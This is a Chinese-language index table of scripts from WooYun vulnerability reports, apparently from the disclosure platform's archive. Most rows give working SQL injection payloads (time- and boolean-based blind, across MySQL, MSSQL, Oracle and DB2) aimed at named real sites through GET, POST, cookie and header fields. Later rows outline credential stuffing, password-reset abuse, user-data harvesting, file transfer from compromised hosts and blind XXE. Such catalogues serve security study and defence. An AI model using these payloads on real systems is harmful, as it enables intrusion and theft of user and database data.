脚本编号 | 注入类型 | 脚本特征 | 补充说明 | |
1. | wooyun-2010-0126775 | GET | (ascii(mid(user()from(%s)for(1)))=%s,benchmark(2000000,md5(1)),0) | if time.time() - t > 1.5 |
2. | wooyun-2010-0120021 | GET | aaa'XOR(if(length(user())=20,sleep(3),0))OR'bbb | try: except: |
3. | wooyun-2010-0119102 | GET/MySQL time blind | (ascii(mid(user()from(%s)for(1)))=%s,benchmark(2000000,md5(1)),0) | if(length(user())=22,sleep(2),0 try: except: 同时,该脚本猜解user(),阀值设得很小, 0.5秒超时 |
4. | wooyun-2010-0118298 | 消息头中Host可注入 | GET / HTTP/1.1 Host: www.baidu.com'or(length(user())=14)or' Referer: http://dns-ch.xinnet.com |
if status == 302 |
5. | wooyun-2010-0114907 | GET | if(ascii(mid(lower(user()),%s,1))=%s,benchmark(2000000,md5(1)),0) |   if time.time() - start_time > 0.5:      timeout_count += 1   else:      break if timeout_count == 3:       user += payload |
6. | wooyun-2010-0114492 | Cookie注入/MySQL bool blind | GET /cart/mini_cart_ajax HTTP/1.1 Cookie: PHPSESSID=c6798728910c94d53a88cd8369b8def5; csdn_cart_user_id=1"%20OR%20length(user())=23--%20; |
if len(html_doc) > 200: |
7. | wooyun-2010-0106276 | POST | aa'XOR(if(ascii(mid(lower(user()),%s,1))=%s,sleep(2),0))OR'bb | try: except: if err_count == 3: |
8. | wooyun-2010-0105690 | GET | if(ascii(mid(lower(user()),%s,1))=%s,sleep(4),0) | try: except: |
9. | wooyun-2010-0104621 | Cookie注入/MySQL bool blind | GET /catering HTTP/1.1 Cookie: PHPSESSID=5dc8189e97e848e3bcab3381649061af; SESSIONID=5dc8189e97e848e3bcab3381649061af; CITY_ID=*; |
if html_doc.find(u'/merchant/detail?storeid=2059629') > 0: |
10. | wooyun-2010-0103884 | POST/MySQL bool blind | aa'XOR(if(length(user())=17,sleep(6),0))OR'bb | 当表达式为True时,延迟超过6秒。 为False,延迟一800ms左右 try: except: |
11. | wooyun-2010-0103670 | POST | 123'xor(sleep(ascii(mid(lower(user()),%s,1))=%s))or #"123'xor(if(%s,sleep(5),0)or'" % s | try: except: |
12. | wooyun-2010-095449 | GET | if(ascii(mid(lower(user()),%s,1))=%s,sleep(10),0) | try: except: |
13. | wooyun-2010-095438 | POST | aa'XOR(if("ascii(mid(lower(user()),%s,1))=%s",sleep(5),0))OR'bb | try: except: |
14. | wooyun-2010-095304 | POST | aa'XOR(if("ascii(mid(user(),%s,1))=%s",sleep(5),0))OR'bb | try: except: |
15. | wooyun-2010-095083 | GET/MySQL bool blind | 'XOR("ascii(mid(lower(user()),%s,1))=%s")OR'bb" | False对应的关键字:No matched winning logo designs |
16. | wooyun-2010-094912 | POST/bool blind | and substring(lower(system_user),%s,1)>'%s | 为True时页面加载缓慢,于是作为一个time blind示例猜解了system_user |
17. | wooyun-2010-094880 | GET/MySQL bool blind | aa'XOR(if("mid(lower(user()),%s,1))=%s",1,0))OR'bb | False对应的关键字:No matched winning logo designs |
18. | wooyun-2010-094603 | GET | /*'%2b(select(0)from(select(if("ascii(mid(user(),%s,1))=%s",sleep(5),0)))v)%2b'%22%2b(select(0)from(select(sleep(0)))v)%2b%22*/ |   if time.time() - start_time > 5:     timeout_count += 1     print '*',   else:     break if timeout_count == 2:    user += payload |
19. | wooyun-2010-094467 | POST/MySQL bool blind | 'aa"XOR(if(ascii(mid(user()from(%s)for(1)))=%s,1,0))OR"bb | 出现“请输入新密码”时为True |
20. | wooyun-2010-092463 | POST | %%' and ascii(substr(lower(user),%s,1))=%s and '%%'=' | IBM DB2数据库 |
21. | wooyun-2010-090164 | GET | %s"XOR(sleep(ascii(mid(lower(user())from(%s)for(1)))=%s))OR"bb' % (random.random(), i, ord(payload)) | |
22. | wooyun-2010-089831 | POST/MySQL bool blind | 1 or ascii(mid(lower(user())from(%s)for(1)))=%s | if html_doc != '0,0,0,0,0,0,0,0,0,0': # True |
23. | wooyun-2010-089924 | GET | /aaa'XOR(if(ascii(mid(user()from(%s)for(1)))=%s,sleep(3),3))OR'bb/ | 注入格式:http://m.soccer.sina.com.hk/t/注入语句 |
24. | wooyun-2010-089917 | POST | aa"XOR(if(ascii(mid(lower(user())from(%s)for(1)))=%s,sleep(3),0))OR"bb | try: except: if timeout_count == 3: |
25. | wooyun-2010-089826 | GET | if(ascii(mid(user()from(%s)for(1)))=%s,sleep(1),3) | |
26. | wooyun-2010-089469 | GET/ | http://zhidao.baidu.com/c/ah189 and mid(lower(database()),1,1)="c" and "1"="1 | if html_doc.find(u'安徽电信企业平台_企业知道_百度知道') > 0: |
27. | wooyun-2010-089304 | POST | 123'XOR(if(ascii(mid(lower(user())from(%s)for(1)))=%s,sleep(5),0))OR'bbb | raise Exception('oooooooops') POST数据中sid每次需要重新获取 经典绕过 |
28. | wooyun-2010-088834 | GET | if (ascii(substring(system_user,%s,1))=%s) waitfor delay '0:0:3' -- | |
29. | wooyun-2010-088750 | POST | if(ascii(mid(lower(user())from(%s)for(1)))=%s,sleep(3),0) | |
30. | wooyun-2010-088431 | GET | 123'XOR(if(ascii(mid(lower(user())from(%s)for(1)))=%s,sleep(5),0))OR'bbb | |
31. | wooyun-2010-088294 | POST/Oracle bool blind | ' OR ascii(substr(SYS_CONTEXT('USERENV','CURRENT_USER'),%s,1))=%s AND 1=1 -- | current_user长度为5  Oracle数据库 |
32. | wooyun-2010-088037 | Cookie注入/Mysql bool blind | ' OR ascii(mid(database(),%s,1))=%s AND 1=1 -- | 表达式为True时,页面返回302;为false,返回200 Cookie中BAIDUID可注入 |
33. | wooyun-2010-087980 | 消息头中Referer可注入 | str(random.random()) + "aaa'XOR(if(ascii(mid(user(),%s,1))=%s,sleep(1),0))OR'bbb" | GET / HTTP/1.1 Referer: aaa* |
34. | wooyun-2010-087825 | GET | 'XOR(if(ascii(mid(user(),%s,1))=%s,sleep(2),0))OR'bbb | 程序如果误报,是因陷入的线程太多,数据库不稳定 try: except: |
35. | wooyun-2010-087531 | GET/MySQL bool blind | (ascii(mid(user(),%s,1))=%s) | 为True时,页面有显示照片的div class="upload_one" |
36. | wooyun-2010-087520 | GET | "%saa'+(select(0)from(select(sleep(if(ascii(mid(user(),%s,1))=%s,5,0))))v)+'bb" % (rand_num, i, ord(payload)) |   if resp.status == 502:      raise Exception('ooooooooops')      print '.',  except Exception, e:     user += payload |
37. | wooyun-2010-086762 | GET | if(ascii(mid(user(),%s,1))=%s,sleep(1),0) | |
38. | wooyun-2010-086516 | GET | sleep(1-abs(sign(ascii(mid(lower(user())from(%s)for(1)))-%s))) | 不带等号注入 通过sleep函数来猜解单个字符 每次取一个字符的ascii码,与列表中的ascii码逐一对比,取符号的绝对值 如果相等此时为True,则符号是0,绝对值是0,会延迟 若不等,则符号是1或-1,绝对值为1,不延迟 |
39. | wooyun-2010-086372 | GET/Mysql bool blind | " AND ascii(mid(lower(user())from(%s)for(1)))=%s AND "123"="123 | if html_doc.find(u'搜索时间') > 0: |
40. | wooyun-2010-084379 | GET | if(ascii(mid(user(),%s,1))=%s,sleep(1),0) | 猜到10的时候,MySQL Server已经挂了,不再深入 |
41. | wooyun-2010-084801 | GET | sleep(ascii(mid(lower(user())from(%s)for(1)))=%s) | 页面有检查Referer,测试时需设定 |
42. | wooyun-2010-083899 | GET/MySQL bool blind | ?? | 出现韩都衣舍时为True |
43. | wooyun-2010-083813 | 消息头中X-Forwarded-For可注入/MSSQL | str(random.random()) + "127.0.0.1'); if (ascii(substring(@@version,%s,1))=%s) waitfor delay '0:0:3' -- " | X-Forwarded-For: 127.0.0.1'); waitfor delay '0:0:1' -- 当前用户sa  尝试查找SQL Server Version |
44. | wooyun-2010-083715 | GET/MySQL Bool blind | AND ascii(mid(user()from(%s)for(1)))=%s AND 'aaa'='aaa | 一个比较隐蔽的注射点 第一眼看网页可能没有什么分别 右键查看源代码,可以发现第757行的内容不一样。Bool blind 出现“城北”为True |
45. | wooyun-2010-083376 | MySQL time-based blind/MySQL bool blind | and ascii(mid(user()from(%s)for(1)))=%s and '1'='1 | 测试基于时间的盲注,大约10个sleep陷入,带参数的页面就全挂了 最后使用了bool的MySQL注射 |
46. | wooyun-2010-083257 | POST(经典) | sleep(ascii(mid(user()from(%s)for(1)))=%s) | 后端不稳定,有一定的几率会出现404,因此把http Request的检查写到单独的函数中 404不管,只顾200和502 这里有个小技巧:一个sleep(1=1),后端是不一定502 time out的 因此我是把3个sleep相加,这样就可以保证后端一定会502 |
47. | wooyun-2010-082740 | GET | 'XOR(if(ascii(mid(user(),%s,1))=%s,sleep(4),0))OR'bbb | |
48. | wooyun-2010-083899 | GET | if (ascii(substring(@@version,%s,1))=%s) waitfor delay '0:0:5' -- | MSSQL 脚本将获得SQL Server Version |
49. | wooyun-2010-082690 | GET | 'XOR(if(ascii(mid(user(),%s,1))=%s,sleep(4),0))OR'bbb | |
50. | wooyun-2010-082564 | POST/MySQL bool blind | AND ascii(substr(SYS_CONTEXT('USERENV','CURRENT_USER'),%s,1))=%s-- | 如果页面返回到达地“广州”,表示True |
51. | wooyun-2010-081949 | GET(经典绕过) | sleep(ascii(mid(user()from(%s)for(1)))=%s) | 联想(公司)二次开发引入的Discuz注入,ThinkPad论坛,部分SQL关键字又被过滤了,比如select,因此报错注入的利用有限制 |
52. | wooyun-2010-081844 | Cookie注入 | if (ascii(substring(@@version,%s,1))=%s) waitfor delay '0:0:5' -- | MSSQL数据库  SQL Server version is Microsoft SQL Server 2008 SP |
53. | wooyun-2010-081815 | POST | if (ascii(substring(@@version,%s,1))=%s) waitfor delay '0:0:5' -- | MSSQL数据库,脚本将得到数据库版本 |
55. | wooyun-2010-079379 | GET | (sleep(ascii(mid(user()from(%s)for(1)))=%s)) | 不带空格和逗号即可注入 |
56. | wooyun-2015-0137143 | XML二次爆破DoS攻击漏洞 | POST提交POC | |
57. | wooyun-2015-0100000 | 撞库攻击 | 碰撞方式获取大量PNR码 | |
58. | wooyun-2015-0109422 | 任意用户密码重置脚本 | 密码格式:$md5=md5(time().rand(0,100)); $md5='lock'.substr($md5,5,strlen($md5)); | |
59. | wooyun-2015-0119851 | 撞库攻击 | 利用burpsuite进行抓包后发现,userID为纯数字,oldPwd可暴力破解,故重置用户密码 | |
60. | wooyun-2015-0126008 | 查询任意用户信息脚本 | 查看源代码发现,用户的用户名,邮箱,id,电话信息出现在隐藏表单里面 | |
61. | wooyun-2016-0172227 | 简单套接字传文件脚本 | 把send.py传到肉鸡上,recv.py传到vps上 | 渗透需要思路 |
62. | wooyun-2015-0120222 | 读取IOS BinaryCookies的脚本 | 尝试使用获得的cookie进行越权操作 | |
63. | wooyun-2014-088964 | 撞库攻击 | name=用户名&pass=密码MD5 Hash&action=login | |
64. | wooyun-2015-0135483 | 查询任意用户信息脚本 | 利用接口查询任意用户信息 | |
65. | wooyun-2015-0145012 | 撞库攻击 | 企业邮箱一处设计缺陷导致撞库攻击 | |
66. | wooyun-2015-0105251 | 利用接口查询任意用户信息 | 提交方式:urllib2.urlopen(req, data="") | |
67. | wooyun-2015-0135615 | Blind XXE | 访问http://**.**.**.**/kv?act=set&k={key}&v={value} 可以在远程主机设置一个键值对 | http://**.**.**.**/kv?act=get&k=刚刚的key 可以查看是否设置了这个键值对,以此进行漏洞的验证 |
68. | wooyun-2015-0135356 | Blind XXE | 没有安全使用simplexml_load_string导致xxe |